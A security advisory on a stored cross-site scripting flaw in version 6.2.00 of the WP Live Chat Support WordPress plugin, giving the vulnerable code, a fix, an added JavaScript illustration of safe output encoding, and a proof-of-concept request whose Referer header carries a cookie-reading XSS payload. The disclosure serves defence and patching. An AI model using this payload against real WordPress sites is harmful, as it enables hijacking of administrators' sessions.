WordPress Live Chat Support 6.2.00 Cross Site Scripting

2016-07-11T00:00:00
ID PACKETSTORM:137859
Type packetstorm
Reporter Han Sahin
Modified 2016-07-11T00:00:00

Description

------------------------------------------------------------------------  
Persistent Cross-Site Scripting in WP Live Chat Support plugin  
------------------------------------------------------------------------  
Han Sahin, July 2016  
  
------------------------------------------------------------------------  
Abstract  
------------------------------------------------------------------------  
A persistent Cross-Site Scripting (XSS) vulnerability has been found in  
the WP Live Chat Support plugin. By using this vulnerability an attacker  
can supply malicious code on behalf of a logged on WordPress user in  
order to perform a wide variety of actions, such as stealing victims'  
session tokens or login credentials, performing arbitrary actions on  
their behalf, and logging their keystrokes.  
  
------------------------------------------------------------------------  
Tested versions  
------------------------------------------------------------------------  
This issue was successfully tested on WP Live Chat Support WordPress  
plugin version 6.2.00.  
  
------------------------------------------------------------------------  
Fix  
------------------------------------------------------------------------  
This issue has been fixed in version 6.2.02 of the WP Live Chat Support  
plugin. The updated plugin can be downloaded from the following  
location:  
https://downloads.wordpress.org/plugin/wp-live-chat-support.zip.  
  
------------------------------------------------------------------------  
Details  
------------------------------------------------------------------------  
https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_in_wp_live_chat_support_plugin.html  
  
The WP Live Chat Support plugin uses the Referer header to present the current page on which the chat is initiated to backend (wp-admin) chat users. However, the URL retrieved from the database isn't properly output encoded according to output context (JavaScript and HTML). As a result persistent Cross-Site Scripting is introduced.  
  
$wpdb->insert(  
    $wplc_tblname_chats,  
    array(  
        'status'                => '5',  
        'timestamp'             => current_time('mysql'),  
        'name'                  => $name,  
        'email'                 => $email,  
        'session'               => $session,  
        'ip'                    => maybe_serialize($user_data),  
        'url'                   => $_SERVER['HTTP_REFERER'], // attacker-controlled, stored without validation  
        'last_active_timestamp' => current_time('mysql'),  
        'other'                 => maybe_serialize($other),  
    ),  
    // %s only binds each value as a string for the INSERT; it does not  
    // encode anything for the HTML/JavaScript output that happens later.  
    array('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s')  
);  
  
The PHP code of the vulnerable output (HTML context) is as follows; $result->url is the stored Referer value and is echoed without any output encoding (no esc_html() or esc_url() call):  
  
echo " <span class='part1'>" . __("Chat initiated on:", "wplivechat") . "</span> <span class='part2'>" . $result->url . "</span>";  
  
The same stored value is also handed to the client-side JavaScript that builds the chat list on that page. The following is a fragment of that string-building code (JavaScript and HTML attribute context), not PHP: v_browsing_url is placed inside a single-quoted href attribute, so a single quote in the stored URL closes the attribute and a '<' starts a new tag:  
  
</span> <a href='"+v_browsing_url+"' target='_BLANK'>"+v_browsing+"</a><br /><span class='wplc-sub-item-header'>Email:</span> <a href='mailto:"+v_email+"' target='_BLANK'>"+v_email+"</a></span>";  
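The two sinks above, rebuilt as an added example in JavaScript. This is not the plugin's code: renderVulnerable, renderSafe, safeUrl, escapeHtml, auditStoredUrls and the SAMPLE_CHATS records are assumptions made for the illustration; only the Referer payload is taken from the proof of concept below. It shows why the payload works against raw concatenation, a hardened renderer that first checks the stored value is an absolute http(s) URL and then encodes it for the attribute and text contexts it lands in, and a check that flags records already stored by a vulnerable version. On the PHP side the equivalent fix for the echo is WordPress's esc_url() for the link target and esc_html() for the visible text.  

```javascript
// Added example (not code from the WP Live Chat Support plugin).
// Names below (renderVulnerable, renderSafe, safeUrl, escapeHtml,
// auditStoredUrls, SAMPLE_CHATS) are assumptions made for this illustration.

// Referer value taken from the advisory's proof-of-concept request.
const POC_REFERER =
  "http://192.168.28.129/'\"><img src=x onerror=alert(document.cookie)>/";

// Constructed sample of what the chat table holds: one normal visitor and
// one record written by the PoC request.
const SAMPLE_CHATS = [
  { name: "Guest", email: "guest@example.com", url: "http://192.168.28.129/contact/" },
  { name: "Sahin", email: "attacker@example.com", url: POC_REFERER },
];

// Vulnerable sink, mirroring the plugin's client-side concatenation: the
// stored URL goes raw into a single-quoted href and into the link text, so a
// single quote ends the attribute and '<' starts a new tag.
function renderVulnerable(chat) {
  return "<a href='" + chat.url + "' target='_BLANK'>" + chat.url + "</a>" +
    "<br /><span class='wplc-sub-item-header'>Email:</span>" +
    " <a href='mailto:" + chat.email + "' target='_BLANK'>" + chat.email + "</a>";
}

// Encode for an HTML text node or a quoted attribute value.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Step 1 of the fix: only absolute http(s) URLs are acceptable as "the page
// the chat was started on"; javascript:, data: and unparsable input yield "".
// The WHATWG parser percent-encodes '"', '<', '>' and spaces in the path but
// NOT the single quote, which is why step 2 (escapeHtml) is still required.
function safeUrl(s) {
  let u;
  try { u = new URL(String(s)); } catch { return ""; }
  return u.protocol === "http:" || u.protocol === "https:" ? u.href : "";
}

// Hardened sink: validate, then encode for each context the value lands in.
function renderSafe(chat) {
  const url = safeUrl(chat.url);
  const link = url
    ? '<a href="' + escapeHtml(url) + '" target="_blank" rel="noopener">' + escapeHtml(url) + "</a>"
    : "<em>(no valid page URL recorded)</em>";
  const email = escapeHtml(chat.email);
  return link + '<br /><span class="wplc-sub-item-header">Email:</span>' +
    ' <a href="mailto:' + email + '" target="_blank">' + email + "</a>";
}

// Check for a site that ran a vulnerable version: records whose stored url is
// not a clean http(s) URL or carries HTML metacharacters need a look.
function auditStoredUrls(chats) {
  return chats.filter((c) => safeUrl(c.url) === "" || /[<>"']/.test(c.url));
}

// Demonstration with the PoC record.
console.log("vulnerable:", renderVulnerable(SAMPLE_CHATS[1]));
console.log("hardened:  ", renderSafe(SAMPLE_CHATS[1]));
console.log("suspicious records:", auditStoredUrls(SAMPLE_CHATS).map((c) => c.name));
```

Run it with node; the "vulnerable" line contains the live img tag while the "hardened" line carries only an inert, encoded path, and the audit names the PoC record. The order of the two steps matters: URL validation alone still leaves the single quote that breaks a single-quoted attribute, and HTML encoding alone would happily render a javascript: link.  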
  
The malicious code supplied by an attacker can be used to perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.  
  
Stored Cross-Site Scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users. The victim (potentially a WordPress administrator) only has to view the wplivechat-menu page, which is generally the first page shown when the plugin is opened:  
  
http://<wordpress site>/wp-admin/admin.php?page=wplivechat-menu  
  
------------------------------------------------------------------------  
Proof of concept  
------------------------------------------------------------------------  
  
This vulnerability can be demonstrated by intercepting the wplc_start_chat request that the visitor-facing chat widget sends to wp-admin/admin-ajax.php after the name and e-mail have been filled in, and replacing the path part of the Referer header with the Cross-Site Scripting payload (the host part is left as is). No WordPress account is needed: this is the request an anonymous visitor makes, and the remaining parameters, including the security value, are simply reused from the intercepted request. The stored URL is then rendered to every backend user who opens the chat list.  
  
POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: 192.168.28.129  
Content-Length: 117  
Accept: */*  
Origin: http://192.168.28.129  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Referer: http://192.168.28.129/'"><img src=x onerror=alert(document.cookie)>/  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.8,nl;q=0.6  
Cookie: wplc_cid=1742; wplc_name=Guest; wplc_email=no%20email%20set; wplc_chat_status=5; iflychat_guest_id=1467535930we14g; iflychat_guest_session=320f0212654acf6216884952f5766c7b; iflychat_guest_name=Guest%20Norene; iflychat_key=undefined; iflychat_css=undefined; iflychat_time=1467535929896; wplc_hide=  
Connection: close  
  
action=wplc_start_chat&security=5d2beba087&name=Sahin&email=han.sahin%40securiy.nl&cid=1742&wplcsession=1467535929687  